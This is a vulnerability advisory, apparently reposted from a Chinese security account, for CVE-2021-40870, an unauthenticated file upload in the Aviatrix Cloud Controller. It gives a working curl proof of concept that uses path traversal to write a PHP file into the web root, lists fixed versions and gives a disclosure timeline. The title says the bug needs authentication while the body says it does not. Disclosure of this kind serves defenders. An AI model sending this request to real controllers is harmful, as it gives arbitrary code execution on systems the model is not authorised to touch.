Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code
Overview
While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php
scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
Proof of concept
-
Make the following request to the Aviatrix Cloud Controller
aviatrix
:
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
-
Visit
https://aviatrix.domain.tld/v1/test
. This will show the PHP Version page.
Mitigation/further actions
Upgrade to one of the following versions:
-
UserConnect-6.2-1804.2043 or later
-
UserConnect-6.3-1804.2490 or later
-
UserConnect-6.4-1804.2838 or later
-
UserConnect-6.5-1804.1922 or later
Advisory timeline
-
2021-05-12: Discovered
-
2021-08-24: Reported to Aviatrix security team
-
2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
-
2021-09-11: Fix released
-
2021-09-12: CVE requested
-
2021-09-13: CVE allocated
https://github.com/0xAgun/CVE-2021-40870
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml
原文始发于微信公众号(无级安全):CVE-2021-40870|POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论